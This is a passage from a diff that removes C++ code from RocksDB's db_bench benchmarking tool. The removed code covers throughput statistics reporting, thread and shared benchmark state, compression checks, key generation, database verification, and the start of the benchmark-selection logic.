-        fprintf(stderr, "... finished %" PRIu64 " ops%30s\r", done_, "");
-      } else {
-        uint64_t now = FLAGS_env->NowMicros();
-        int64_t usecs_since_last = now - last_report_finish_;
-
-        // Determine whether to print status where interval is either
-        // each N operations or each N seconds.
-
-        if (FLAGS_stats_interval_seconds &&
-            usecs_since_last < (FLAGS_stats_interval_seconds * 1000000)) {
-          // Don't check again for this many operations
-          next_report_ += FLAGS_stats_interval;
-
-        } else {
-
-          fprintf(stderr,
-                  "%s ... thread %d: (%" PRIu64 ",%" PRIu64 ") ops and "
-                  "(%.1f,%.1f) ops/second in (%.6f,%.6f) seconds\n",
-                  FLAGS_env->TimeToString(now/1000000).c_str(),
-                  id_,
-                  done_ - last_report_done_, done_,
-                  (done_ - last_report_done_) /
-                  (usecs_since_last / 1000000.0),
-                  done_ / ((now - start_) / 1000000.0),
-                  (now - last_report_finish_) / 1000000.0,
-                  (now - start_) / 1000000.0);
-
-          if (id_ == 0 && FLAGS_stats_per_interval) {
-            std::string stats;
-
-            if (db_with_cfh && db_with_cfh->num_created.load()) {
-              for (size_t i = 0; i < db_with_cfh->num_created.load(); ++i) {
-                if (db->GetProperty(db_with_cfh->cfh[i], "rocksdb.cfstats",
-                                    &stats))
-                  fprintf(stderr, "%s\n", stats.c_str());
-                if (FLAGS_show_table_properties) {
-                  for (int level = 0; level < FLAGS_num_levels; ++level) {
-                    if (db->GetProperty(
-                            db_with_cfh->cfh[i],
-                            "rocksdb.aggregated-table-properties-at-level" +
-                                ToString(level),
-                            &stats)) {
-                      if (stats.find("# entries=0") == std::string::npos) {
-                        fprintf(stderr, "Level[%d]: %s\n", level,
-                                stats.c_str());
-                      }
-                    }
-                  }
-                }
-              }
-            } else if (db) {
-              if (db->GetProperty("rocksdb.stats", &stats)) {
-                fprintf(stderr, "%s\n", stats.c_str());
-              }
-              if (FLAGS_show_table_properties) {
-                for (int level = 0; level < FLAGS_num_levels; ++level) {
-                  if (db->GetProperty(
-                          "rocksdb.aggregated-table-properties-at-level" +
-                              ToString(level),
-                          &stats)) {
-                    if (stats.find("# entries=0") == std::string::npos) {
-                      fprintf(stderr, "Level[%d]: %s\n", level, stats.c_str());
-                    }
-                  }
-                }
-              }
-            }
-          }
-
-          next_report_ += FLAGS_stats_interval;
-          last_report_finish_ = now;
-          last_report_done_ = done_;
-        }
-      }
-      if (id_ == 0 && FLAGS_thread_status_per_interval) {
-        PrintThreadStatus();
-      }
-      fflush(stderr);
-    }
-  }
-
-  void AddBytes(int64_t n) {
-    bytes_ += n;
-  }
-
-  void Report(const Slice& name) {
-    // Pretend at least one op was done in case we are running a benchmark
-    // that does not call FinishedOps().
-    if (done_ < 1) done_ = 1;
-
-    std::string extra;
-    if (bytes_ > 0) {
-      // Rate is computed on actual elapsed time, not the sum of per-thread
-      // elapsed times.
-      double elapsed = (finish_ - start_) * 1e-6;
-      char rate[100];
-      snprintf(rate, sizeof(rate), "%6.1f MB/s",
-               (bytes_ / 1048576.0) / elapsed);
-      extra = rate;
-    }
-    AppendWithSpace(&extra, message_);
-    double elapsed = (finish_ - start_) * 1e-6;
-    double throughput = (double)done_/elapsed;
-
-    fprintf(stdout, "%-12s : %11.3f micros/op %ld ops/sec;%s%s\n",
-            name.ToString().c_str(),
-            elapsed * 1e6 / done_,
-            (long)throughput,
-            (extra.empty() ? "" : " "),
-            extra.c_str());
-    if (FLAGS_histogram) {
-      for (auto it = hist_.begin(); it != hist_.end(); ++it) {
-        fprintf(stdout, "Microseconds per %s:\n%s\n",
-                OperationTypeString[it->first].c_str(),
-                it->second->ToString().c_str());
-      }
-    }
-    if (FLAGS_report_file_operations) {
-      ReportFileOpEnv* env = static_cast<ReportFileOpEnv*>(FLAGS_env);
-      ReportFileOpCounters* counters = env->counters();
-      fprintf(stdout, "Num files opened: %d\n",
-              counters->open_counter_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num Read(): %d\n",
-              counters->read_counter_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num Append(): %d\n",
-              counters->append_counter_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num bytes read: %" PRIu64 "\n",
-              counters->bytes_read_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num bytes written: %" PRIu64 "\n",
-              counters->bytes_written_.load(std::memory_order_relaxed));
-      env->reset();
-    }
-    fflush(stdout);
-  }
-};
-
-class CombinedStats {
- public:
-  void AddStats(const Stats& stat) {
-    uint64_t total_ops = stat.done_;
-    uint64_t total_bytes_ = stat.bytes_;
-    double elapsed;
-
-    if (total_ops < 1) {
-      total_ops = 1;
-    }
-
-    elapsed = (stat.finish_ - stat.start_) * 1e-6;
-    throughput_ops_.emplace_back(total_ops / elapsed);
-
-    if (total_bytes_ > 0) {
-      double mbs = (total_bytes_ / 1048576.0);
-      throughput_mbs_.emplace_back(mbs / elapsed);
-    }
-  }
-
-  void Report(const std::string& bench_name) {
-    const char* name = bench_name.c_str();
-    int num_runs = static_cast<int>(throughput_ops_.size());
-
-    if (throughput_mbs_.size() == throughput_ops_.size()) {
-      fprintf(stdout,
-              "%s [AVG    %d runs] : %d ops/sec; %6.1f MB/sec\n"
-              "%s [MEDIAN %d runs] : %d ops/sec; %6.1f MB/sec\n",
-              name, num_runs, static_cast<int>(CalcAvg(throughput_ops_)),
-              CalcAvg(throughput_mbs_), name, num_runs,
-              static_cast<int>(CalcMedian(throughput_ops_)),
-              CalcMedian(throughput_mbs_));
-    } else {
-      fprintf(stdout,
-              "%s [AVG    %d runs] : %d ops/sec\n"
-              "%s [MEDIAN %d runs] : %d ops/sec\n",
-              name, num_runs, static_cast<int>(CalcAvg(throughput_ops_)), name,
-              num_runs, static_cast<int>(CalcMedian(throughput_ops_)));
-    }
-  }
-
- private:
-  double CalcAvg(std::vector<double> data) {
-    double avg = 0;
-    for (double x : data) {
-      avg += x;
-    }
-    avg = avg / data.size();
-    return avg;
-  }
-
-  double CalcMedian(std::vector<double> data) {
-    assert(data.size() > 0);
-    std::sort(data.begin(), data.end());
-
-    size_t mid = data.size() / 2;
-    if (data.size() % 2 == 1) {
-      // Odd number of entries
-      return data[mid];
-    } else {
-      // Even number of entries
-      return (data[mid] + data[mid - 1]) / 2;
-    }
-  }
-
-  std::vector<double> throughput_ops_;
-  std::vector<double> throughput_mbs_;
-};
-
-class TimestampEmulator {
- private:
-  std::atomic<uint64_t> timestamp_;
-
- public:
-  TimestampEmulator() : timestamp_(0) {}
-  uint64_t Get() const { return timestamp_.load(); }
-  void Inc() { timestamp_++; }
-};
-
-// State shared by all concurrent executions of the same benchmark.
-struct SharedState {
-  port::Mutex mu;
-  port::CondVar cv;
-  int total;
-  int perf_level;
-  std::shared_ptr<RateLimiter> write_rate_limiter;
-  std::shared_ptr<RateLimiter> read_rate_limiter;
-
-  // Each thread goes through the following states:
-  //    (1) initializing
-  //    (2) waiting for others to be initialized
-  //    (3) running
-  //    (4) done
-
-  long num_initialized;
-  long num_done;
-  bool start;
-
-  SharedState() : cv(&mu), perf_level(FLAGS_perf_level) { }
-};
-
-// Per-thread state for concurrent executions of the same benchmark.
-struct ThreadState {
-  int tid;             // 0..n-1 when running in n threads
-  Random64 rand;         // Has different seeds for different threads
-  Stats stats;
-  SharedState* shared;
-
-  /* implicit */ ThreadState(int index)
-      : tid(index),
-        rand((FLAGS_seed ? FLAGS_seed : 1000) + index) {
-  }
-};
-
-class Duration {
- public:
-  Duration(uint64_t max_seconds, int64_t max_ops, int64_t ops_per_stage = 0) {
-    max_seconds_ = max_seconds;
-    max_ops_= max_ops;
-    ops_per_stage_ = (ops_per_stage > 0) ? ops_per_stage : max_ops;
-    ops_ = 0;
-    start_at_ = FLAGS_env->NowMicros();
-  }
-
-  int64_t GetStage() { return std::min(ops_, max_ops_ - 1) / ops_per_stage_; }
-
-  bool Done(int64_t increment) {
-    if (increment <= 0) increment = 1;    // avoid Done(0) and infinite loops
-    ops_ += increment;
-
-    if (max_seconds_) {
-      // Recheck every appx 1000 ops (exact iff increment is factor of 1000)
-      auto granularity = FLAGS_ops_between_duration_checks;
-      if ((ops_ / granularity) != ((ops_ - increment) / granularity)) {
-        uint64_t now = FLAGS_env->NowMicros();
-        return ((now - start_at_) / 1000000) >= max_seconds_;
-      } else {
-        return false;
-      }
-    } else {
-      return ops_ > max_ops_;
-    }
-  }
-
- private:
-  uint64_t max_seconds_;
-  int64_t max_ops_;
-  int64_t ops_per_stage_;
-  int64_t ops_;
-  uint64_t start_at_;
-};
-
-class Benchmark {
- private:
-  std::shared_ptr<Cache> cache_;
-  std::shared_ptr<Cache> compressed_cache_;
-  std::shared_ptr<const FilterPolicy> filter_policy_;
-  const SliceTransform* prefix_extractor_;
-  DBWithColumnFamilies db_;
-  std::vector<DBWithColumnFamilies> multi_dbs_;
-  int64_t num_;
-  int value_size_;
-  int key_size_;
-  int prefix_size_;
-  int64_t keys_per_prefix_;
-  int64_t entries_per_batch_;
-  int64_t writes_per_range_tombstone_;
-  int64_t range_tombstone_width_;
-  int64_t max_num_range_tombstones_;
-  WriteOptions write_options_;
-  Options open_options_;  // keep options around to properly destroy db later
-  int64_t reads_;
-  int64_t deletes_;
-  double read_random_exp_range_;
-  int64_t writes_;
-  int64_t readwrites_;
-  int64_t merge_keys_;
-  bool report_file_operations_;
-  bool use_blob_db_;
-
-  bool SanityCheck() {
-    if (FLAGS_compression_ratio > 1) {
-      fprintf(stderr, "compression_ratio should be between 0 and 1\n");
-      return false;
-    }
-    return true;
-  }
-
-  inline bool CompressSlice(const Slice& input, std::string* compressed) {
-    bool ok = true;
-    switch (FLAGS_compression_type_e) {
-      case rocksdb::kSnappyCompression:
-        ok = Snappy_Compress(Options().compression_opts, input.data(),
-                             input.size(), compressed);
-        break;
-      case rocksdb::kZlibCompression:
-        ok = Zlib_Compress(Options().compression_opts, 2, input.data(),
-                           input.size(), compressed);
-        break;
-      case rocksdb::kBZip2Compression:
-        ok = BZip2_Compress(Options().compression_opts, 2, input.data(),
-                            input.size(), compressed);
-        break;
-      case rocksdb::kLZ4Compression:
-        ok = LZ4_Compress(Options().compression_opts, 2, input.data(),
-                          input.size(), compressed);
-        break;
-      case rocksdb::kLZ4HCCompression:
-        ok = LZ4HC_Compress(Options().compression_opts, 2, input.data(),
-                            input.size(), compressed);
-        break;
-      case rocksdb::kXpressCompression:
-        ok = XPRESS_Compress(input.data(),
-          input.size(), compressed);
-        break;
-      case rocksdb::kZSTD:
-        ok = ZSTD_Compress(Options().compression_opts, input.data(),
-                           input.size(), compressed);
-        break;
-      default:
-        ok = false;
-    }
-    return ok;
-  }
-
-  void PrintHeader() {
-    PrintEnvironment();
-    fprintf(stdout, "Keys:       %d bytes each\n", FLAGS_key_size);
-    fprintf(stdout, "Values:     %d bytes each (%d bytes after compression)\n",
-            FLAGS_value_size,
-            static_cast<int>(FLAGS_value_size * FLAGS_compression_ratio + 0.5));
-    fprintf(stdout, "Entries:    %" PRIu64 "\n", num_);
-    fprintf(stdout, "Prefix:    %d bytes\n", FLAGS_prefix_size);
-    fprintf(stdout, "Keys per prefix:    %" PRIu64 "\n", keys_per_prefix_);
-    fprintf(stdout, "RawSize:    %.1f MB (estimated)\n",
-            ((static_cast<int64_t>(FLAGS_key_size + FLAGS_value_size) * num_)
-             / 1048576.0));
-    fprintf(stdout, "FileSize:   %.1f MB (estimated)\n",
-            (((FLAGS_key_size + FLAGS_value_size * FLAGS_compression_ratio)
-              * num_)
-             / 1048576.0));
-    fprintf(stdout, "Write rate: %" PRIu64 " bytes/second\n",
-            FLAGS_benchmark_write_rate_limit);
-    fprintf(stdout, "Read rate: %" PRIu64 " ops/second\n",
-            FLAGS_benchmark_read_rate_limit);
-    if (FLAGS_enable_numa) {
-      fprintf(stderr, "Running in NUMA enabled mode.\n");
-#ifndef NUMA
-      fprintf(stderr, "NUMA is not defined in the system.\n");
-      exit(1);
-#else
-      if (numa_available() == -1) {
-        fprintf(stderr, "NUMA is not supported by the system.\n");
-        exit(1);
-      }
-#endif
-    }
-
-    auto compression = CompressionTypeToString(FLAGS_compression_type_e);
-    fprintf(stdout, "Compression: %s\n", compression.c_str());
-
-    switch (FLAGS_rep_factory) {
-      case kPrefixHash:
-        fprintf(stdout, "Memtablerep: prefix_hash\n");
-        break;
-      case kSkipList:
-        fprintf(stdout, "Memtablerep: skip_list\n");
-        break;
-      case kVectorRep:
-        fprintf(stdout, "Memtablerep: vector\n");
-        break;
-      case kHashLinkedList:
-        fprintf(stdout, "Memtablerep: hash_linkedlist\n");
-        break;
-      case kCuckoo:
-        fprintf(stdout, "Memtablerep: cuckoo\n");
-        break;
-    }
-    fprintf(stdout, "Perf Level: %d\n", FLAGS_perf_level);
-
-    PrintWarnings(compression.c_str());
-    fprintf(stdout, "------------------------------------------------\n");
-  }
-
-  void PrintWarnings(const char* compression) {
-#if defined(__GNUC__) && !defined(__OPTIMIZE__)
-    fprintf(stdout,
-            "WARNING: Optimization is disabled: benchmarks unnecessarily slow\n"
-            );
-#endif
-#ifndef NDEBUG
-    fprintf(stdout,
-            "WARNING: Assertions are enabled; benchmarks unnecessarily slow\n");
-#endif
-    if (FLAGS_compression_type_e != rocksdb::kNoCompression) {
-      // The test string should not be too small.
-      const int len = FLAGS_block_size;
-      std::string input_str(len, 'y');
-      std::string compressed;
-      bool result = CompressSlice(Slice(input_str), &compressed);
-
-      if (!result) {
-        fprintf(stdout, "WARNING: %s compression is not enabled\n",
-                compression);
-      } else if (compressed.size() >= input_str.size()) {
-        fprintf(stdout, "WARNING: %s compression is not effective\n",
-                compression);
-      }
-    }
-  }
-
-// Current the following isn't equivalent to OS_LINUX.
-#if defined(__linux)
-  static Slice TrimSpace(Slice s) {
-    unsigned int start = 0;
-    while (start < s.size() && isspace(s[start])) {
-      start++;
-    }
-    unsigned int limit = static_cast<unsigned int>(s.size());
-    while (limit > start && isspace(s[limit-1])) {
-      limit--;
-    }
-    return Slice(s.data() + start, limit - start);
-  }
-#endif
-
-  void PrintEnvironment() {
-    fprintf(stderr, "RocksDB:    version %d.%d\n",
-            kMajorVersion, kMinorVersion);
-
-#if defined(__linux)
-    time_t now = time(nullptr);
-    char buf[52];
-    // Lint complains about ctime() usage, so replace it with ctime_r(). The
-    // requirement is to provide a buffer which is at least 26 bytes.
-    fprintf(stderr, "Date:       %s",
-            ctime_r(&now, buf));  // ctime_r() adds newline
-
-    FILE* cpuinfo = fopen("/proc/cpuinfo", "r");
-    if (cpuinfo != nullptr) {
-      char line[1000];
-      int num_cpus = 0;
-      std::string cpu_type;
-      std::string cache_size;
-      while (fgets(line, sizeof(line), cpuinfo) != nullptr) {
-        const char* sep = strchr(line, ':');
-        if (sep == nullptr) {
-          continue;
-        }
-        Slice key = TrimSpace(Slice(line, sep - 1 - line));
-        Slice val = TrimSpace(Slice(sep + 1));
-        if (key == "model name") {
-          ++num_cpus;
-          cpu_type = val.ToString();
-        } else if (key == "cache size") {
-          cache_size = val.ToString();
-        }
-      }
-      fclose(cpuinfo);
-      fprintf(stderr, "CPU:        %d * %s\n", num_cpus, cpu_type.c_str());
-      fprintf(stderr, "CPUCache:   %s\n", cache_size.c_str());
-    }
-#endif
-  }
-
-  static bool KeyExpired(const TimestampEmulator* timestamp_emulator,
-                         const Slice& key) {
-    const char* pos = key.data();
-    pos += 8;
-    uint64_t timestamp = 0;
-    if (port::kLittleEndian) {
-      int bytes_to_fill = 8;
-      for (int i = 0; i < bytes_to_fill; ++i) {
-        timestamp |= (static_cast<uint64_t>(static_cast<unsigned char>(pos[i]))
-                      << ((bytes_to_fill - i - 1) << 3));
-      }
-    } else {
-      memcpy(&timestamp, pos, sizeof(timestamp));
-    }
-    return timestamp_emulator->Get() - timestamp > FLAGS_time_range;
-  }
-
-  class ExpiredTimeFilter : public CompactionFilter {
-   public:
-    explicit ExpiredTimeFilter(
-        const std::shared_ptr<TimestampEmulator>& timestamp_emulator)
-        : timestamp_emulator_(timestamp_emulator) {}
-    bool Filter(int level, const Slice& key, const Slice& existing_value,
-                std::string* new_value, bool* value_changed) const override {
-      return KeyExpired(timestamp_emulator_.get(), key);
-    }
-    const char* Name() const override { return "ExpiredTimeFilter"; }
-
-   private:
-    std::shared_ptr<TimestampEmulator> timestamp_emulator_;
-  };
-
-  std::shared_ptr<Cache> NewCache(int64_t capacity) {
-    if (capacity <= 0) {
-      return nullptr;
-    }
-    if (FLAGS_use_clock_cache) {
-      auto cache = NewClockCache((size_t)capacity, FLAGS_cache_numshardbits);
-      if (!cache) {
-        fprintf(stderr, "Clock cache not supported.");
-        exit(1);
-      }
-      return cache;
-    } else {
-      return NewLRUCache((size_t)capacity, FLAGS_cache_numshardbits,
-                         false /*strict_capacity_limit*/,
-                         FLAGS_cache_high_pri_pool_ratio);
-    }
-  }
-
- public:
-  Benchmark()
-      : cache_(NewCache(FLAGS_cache_size)),
-        compressed_cache_(NewCache(FLAGS_compressed_cache_size)),
-        filter_policy_(FLAGS_bloom_bits >= 0
-                           ? NewBloomFilterPolicy(FLAGS_bloom_bits,
-                                                  FLAGS_use_block_based_filter)
-                           : nullptr),
-        prefix_extractor_(NewFixedPrefixTransform(FLAGS_prefix_size)),
-        num_(FLAGS_num),
-        value_size_(FLAGS_value_size),
-        key_size_(FLAGS_key_size),
-        prefix_size_(FLAGS_prefix_size),
-        keys_per_prefix_(FLAGS_keys_per_prefix),
-        entries_per_batch_(1),
-        reads_(FLAGS_reads < 0 ? FLAGS_num : FLAGS_reads),
-        read_random_exp_range_(0.0),
-        writes_(FLAGS_writes < 0 ? FLAGS_num : FLAGS_writes),
-        readwrites_(
-            (FLAGS_writes < 0 && FLAGS_reads < 0)
-                ? FLAGS_num
-                : ((FLAGS_writes > FLAGS_reads) ? FLAGS_writes : FLAGS_reads)),
-        merge_keys_(FLAGS_merge_keys < 0 ? FLAGS_num : FLAGS_merge_keys),
-        report_file_operations_(FLAGS_report_file_operations),
-#ifndef ROCKSDB_LITE
-        use_blob_db_(FLAGS_use_blob_db) {
-#else
-        use_blob_db_(false) {
-#endif  // !ROCKSDB_LITE
-    // use simcache instead of cache
-    if (FLAGS_simcache_size >= 0) {
-      if (FLAGS_cache_numshardbits >= 1) {
-        cache_ =
-            NewSimCache(cache_, FLAGS_simcache_size, FLAGS_cache_numshardbits);
-      } else {
-        cache_ = NewSimCache(cache_, FLAGS_simcache_size, 0);
-      }
-    }
-
-    if (report_file_operations_) {
-      if (!FLAGS_hdfs.empty()) {
-        fprintf(stderr,
-                "--hdfs and --report_file_operations cannot be enabled "
-                "at the same time");
-        exit(1);
-      }
-      FLAGS_env = new ReportFileOpEnv(rocksdb::Env::Default());
-    }
-
-    if (FLAGS_prefix_size > FLAGS_key_size) {
-      fprintf(stderr, "prefix size is larger than key size");
-      exit(1);
-    }
-
-    std::vector<std::string> files;
-    FLAGS_env->GetChildren(FLAGS_db, &files);
-    for (size_t i = 0; i < files.size(); i++) {
-      if (Slice(files[i]).starts_with("heap-")) {
-        FLAGS_env->DeleteFile(FLAGS_db + "/" + files[i]);
-      }
-    }
-    if (!FLAGS_use_existing_db) {
-      Options options;
-      if (!FLAGS_wal_dir.empty()) {
-        options.wal_dir = FLAGS_wal_dir;
-      }
-#ifndef ROCKSDB_LITE
-      if (use_blob_db_) {
-        blob_db::DestroyBlobDB(FLAGS_db, options, blob_db::BlobDBOptions());
-      }
-#endif  // !ROCKSDB_LITE
-      DestroyDB(FLAGS_db, options);
-      if (!FLAGS_wal_dir.empty()) {
-        FLAGS_env->DeleteDir(FLAGS_wal_dir);
-      }
-
-      if (FLAGS_num_multi_db > 1) {
-        FLAGS_env->CreateDir(FLAGS_db);
-        if (!FLAGS_wal_dir.empty()) {
-          FLAGS_env->CreateDir(FLAGS_wal_dir);
-        }
-      }
-    }
-  }
-
-  ~Benchmark() {
-    db_.DeleteDBs();
-    delete prefix_extractor_;
-    if (cache_.get() != nullptr) {
-      // this will leak, but we're shutting down so nobody cares
-      cache_->DisownData();
-    }
-  }
-
-  Slice AllocateKey(std::unique_ptr<const char[]>* key_guard) {
-    char* data = new char[key_size_];
-    const char* const_data = data;
-    key_guard->reset(const_data);
-    return Slice(key_guard->get(), key_size_);
-  }
-
-  // Generate key according to the given specification and random number.
-  // The resulting key will have the following format (if keys_per_prefix_
-  // is positive), extra trailing bytes are either cut off or padded with '0'.
-  // The prefix value is derived from key value.
-  //   ----------------------------
-  //   | prefix 00000 | key 00000 |
-  //   ----------------------------
-  // If keys_per_prefix_ is 0, the key is simply a binary representation of
-  // random number followed by trailing '0's
-  //   ----------------------------
-  //   |        key 00000         |
-  //   ----------------------------
-  void GenerateKeyFromInt(uint64_t v, int64_t num_keys, Slice* key) {
-    char* start = const_cast<char*>(key->data());
-    char* pos = start;
-    if (keys_per_prefix_ > 0) {
-      int64_t num_prefix = num_keys / keys_per_prefix_;
-      int64_t prefix = v % num_prefix;
-      int bytes_to_fill = std::min(prefix_size_, 8);
-      if (port::kLittleEndian) {
-        for (int i = 0; i < bytes_to_fill; ++i) {
-          pos[i] = (prefix >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-        }
-      } else {
-        memcpy(pos, static_cast<void*>(&prefix), bytes_to_fill);
-      }
-      if (prefix_size_ > 8) {
-        // fill the rest with 0s
-        memset(pos + 8, '0', prefix_size_ - 8);
-      }
-      pos += prefix_size_;
-    }
-
-    int bytes_to_fill = std::min(key_size_ - static_cast<int>(pos - start), 8);
-    if (port::kLittleEndian) {
-      for (int i = 0; i < bytes_to_fill; ++i) {
-        pos[i] = (v >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-      }
-    } else {
-      memcpy(pos, static_cast<void*>(&v), bytes_to_fill);
-    }
-    pos += bytes_to_fill;
-    if (key_size_ > pos - start) {
-      memset(pos, '0', key_size_ - (pos - start));
-    }
-  }
-
-  std::string GetPathForMultiple(std::string base_name, size_t id) {
-    if (!base_name.empty()) {
-#ifndef OS_WIN
-      if (base_name.back() != '/') {
-        base_name += '/';
-      }
-#else
-      if (base_name.back() != '\\') {
-        base_name += '\\';
-      }
-#endif
-    }
-    return base_name + ToString(id);
-  }
-
-void VerifyDBFromDB(std::string& truth_db_name) {
-  DBWithColumnFamilies truth_db;
-  auto s = DB::OpenForReadOnly(open_options_, truth_db_name, &truth_db.db);
-  if (!s.ok()) {
-    fprintf(stderr, "open error: %s\n", s.ToString().c_str());
-    exit(1);
-  }
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  std::unique_ptr<Iterator> truth_iter(truth_db.db->NewIterator(ro));
-  std::unique_ptr<Iterator> db_iter(db_.db->NewIterator(ro));
-  // Verify that all the key/values in truth_db are retrivable in db with ::Get
-  fprintf(stderr, "Verifying db >= truth_db with ::Get...\n");
-  for (truth_iter->SeekToFirst(); truth_iter->Valid(); truth_iter->Next()) {
-      std::string value;
-      s = db_.db->Get(ro, truth_iter->key(), &value);
-      assert(s.ok());
-      // TODO(myabandeh): provide debugging hints
-      assert(Slice(value) == truth_iter->value());
-  }
-  // Verify that the db iterator does not give any extra key/value
-  fprintf(stderr, "Verifying db == truth_db...\n");
-  for (db_iter->SeekToFirst(), truth_iter->SeekToFirst(); db_iter->Valid(); db_iter->Next(), truth_iter->Next()) {
-    assert(truth_iter->Valid());
-    assert(truth_iter->value() == db_iter->value());
-  }
-  // No more key should be left unchecked in truth_db
-  assert(!truth_iter->Valid());
-  fprintf(stderr, "...Verified\n");
-}
-
-  void Run() {
-    if (!SanityCheck()) {
-      exit(1);
-    }
-    Open(&open_options_);
-    PrintHeader();
-    std::stringstream benchmark_stream(FLAGS_benchmarks);
-    std::string name;
-    std::unique_ptr<ExpiredTimeFilter> filter;
-    while (std::getline(benchmark_stream, name, ',')) {
-      // Sanitize parameters
-      num_ = FLAGS_num;
-      reads_ = (FLAGS_reads < 0 ? FLAGS_num : FLAGS_reads);
-      writes_ = (FLAGS_writes < 0 ? FLAGS_num : FLAGS_writes);
-      deletes_ = (FLAGS_deletes < 0 ? FLAGS_num : FLAGS_deletes);
-      value_size_ = FLAGS_value_size;
-      key_size_ = FLAGS_key_size;
-      entries_per_batch_ = FLAGS_batch_size;
-      writes_per_range_tombstone_ = FLAGS_writes_per_range_tombstone;
-      range_tombstone_width_ = FLAGS_range_tombstone_width;
-      max_num_range_tombstones_ = FLAGS_max_num_range_tombstones;
-      write_options_ = WriteOptions();
-      read_random_exp_range_ = FLAGS_read_random_exp_range;
-      if (FLAGS_sync) {
-        write_options_.sync = true;
-      }
-      write_options_.disableWAL = FLAGS_disable_wal;
-
-      void (Benchmark::*method)(ThreadState*) = nullptr;
-      void (Benchmark::*post_process_method)() = nullptr;
-
-      bool fresh_db = false;
-      int num_threads = FLAGS_threads;
-
-      int num_repeat = 1;
-      int num_warmup = 0;
-      if (!name.empty() && *name.rbegin() == ']') {
-        auto it = name.find('[');
-        if (it == std::string::npos) {
-          fprintf(stderr, "unknown benchmark arguments '%s'\n", name.c_str());
-          exit(1);
-        }
-        std::string args = name.substr(it + 1);
-        args.resize(args.size() - 1);
-        name.resize(it);
-
-        std::string bench_arg;
-        std::stringstream args_stream(args);
-        while (std::getline(args_stream, bench_arg, '-')) {
-          if (bench_arg.empty()) {
-            continue;
-          }
-          if (bench_arg[0] == 'X') {
-            // Repeat the benchmark n times
-            std::string num_str = bench_arg.substr(1);
-            num_repeat = std::stoi(num_str);
-          } else if (bench_arg[0] == 'W') {
-            // Warm up the benchmark for n times
-            std::string num_str = bench_arg.substr(1);
-            num_warmup = std::stoi(num_str);
-          }
-        }
-      }
-
-      // Both fillseqdeterministic and filluniquerandomdeterministic
-      // fill the levels except the max level with UNIQUE_RANDOM
-      // and fill the max level with fillseq and filluniquerandom, respectively
-      if (name == "fillseqdeterministic" ||
-          name == "filluniquerandomdeterministic") {
-        if (!FLAGS_disable_auto_compactions) {
-          fprintf(stderr,
-                  "Please disable_auto_compactions in FillDeterministic "
-                  "benchmark\n");
-          exit(1);
-        }
-        if (num_threads > 1) {
-          fprintf(stderr,
-                  "filldeterministic multithreaded not supported"
-                  ", use 1 thread\n");
-          num_threads = 1;
-        }
-        fresh_db = true;
-        if (name == "fillseqdeterministic") {
-          method = &Benchmark::WriteSeqDeterministic;
-        } else {
-          method = &Benchmark::WriteUniqueRandomDeterministic;
-        }
-      } else if (name == "fillseq") {
-        fresh_db = true;
-        method = &Benchmark::WriteSeq;
-      } else if (name == "fillbatch") {
-        fresh_db = true;
-        entries_per_batch_ = 1000;
-        method = &Benchmark::WriteSeq;
-      } else if (name == "fillrandom") {
-        fresh_db = true;
-        method = &Benchmark::WriteRandom;
-      } else if (name == "filluniquerandom") {
-        fresh_db = true;
-        if (num_threads > 1) {
-          fprintf(stderr,
-                  "filluniquerandom multithreaded not supported"
-                  ", use 1 thread");
-          num_threads = 1;
-        }
-        method = &Benchmark::WriteUniqueRandom;
-      } else if (name == "overwrite") {
-        method = &Benchmark::WriteRandom;
-      } else if (name == "fillsync") {
-        fresh_db = true;
-        num_ /= 1000;
-        write_options_.sync = true;
-        method = &Benchmark::WriteRandom;
-      } else if (name == "fill100K") {
-        fresh_db = true;
-        num_ /= 1000;
-        value_size_ = 100 * 1000;
-        method = &Benchmark::WriteRandom;
-      } else if (name == "readseq") {
-        method = &Benchmark::ReadSequential;
-      } else if (name == "readtocache") {
-        method = &Benchmark::ReadSequential;
-        num_threads = 1;
-        reads_ = num_;
-      } else if (name == "readreverse") {
-        method = &Benchmark::ReadReverse;
-      } else if (name == "readrandom") {
-        method = &Benchmark::ReadRandom;
-      } else if (name == "readrandomfast") {
-        method = &Benchmark::ReadRandomFast;
-      } else if (name == "multireadrandom") {
-        fprintf(stderr, "entries_per_batch = %" PRIi64 "\n",
-                entries_per_batch_);
-        method = &Benchmark::MultiReadRandom;
-      } else if (name == "readmissing") {
-        ++key_size_;
-        method = &Benchmark::ReadRandom;
-      } else if (name == "newiterator") {
-        method = &Benchmark::IteratorCreation;
-      } else if (name == "newiteratorwhilewriting") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::IteratorCreationWhileWriting;
-      } else if (name == "seekrandom") {
-        method = &Benchmark::SeekRandom;
-      } else if (name == "seekrandomwhilewriting") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::SeekRandomWhileWriting;
-      } else if (name == "seekrandomwhilemerging") {
-        num_threads++;  // Add extra thread for merging
-        method = &Benchmark::SeekRandomWhileMerging;
-      } else if (name == "readrandomsmall") {
-        reads_ /= 1000;
-        method = &Benchmark::ReadRandom;
-      } else if (name == "deleteseq") {
-        method = &Benchmark::DeleteSeq;
-      } else if (name == "deleterandom") {
-        method = &Benchmark::DeleteRandom;
-      } else if (name == "readwhilewriting") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::ReadWhileWriting;
-      } else if (name == "readwhilemerging") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::ReadWhileMerging;
-      } else if (name == "readrandomwriterandom") {
-        method = &Benchmark::ReadRandomWriteRandom;
-      } else if (name == "readrandommergerandom") {
-        if (FLAGS_merge_operator.empty()) {
-          fprintf(stdout, "%-12s : skipped (--merge_operator is unknown)\n",
-                  name.c_str());
-          exit(1);
-        }
-        method = &Benchmark::ReadRandomMergeRandom;
-      } else if (name == "updaterandom") {
-        method = &Benchmark::UpdateRandom;
-      } else if (name == "appendrandom") {
-        method = &Benchmark::AppendRandom;
-      } else if (name == "mergerandom") {
-        if (FLAGS_merge_operator.empty()) {
-          fprintf(stdout, "%-12s : skipped (--merge_operator is unknown)\n",
-                  name.c_str());
-          exit(1);
-        }
-        method = &Benchmark::MergeRandom;
-      } else if (name == "randomwithverify") {
-        method = &Benchmark::RandomWithVerify;
-      } else if (name == "fillseekseq") {
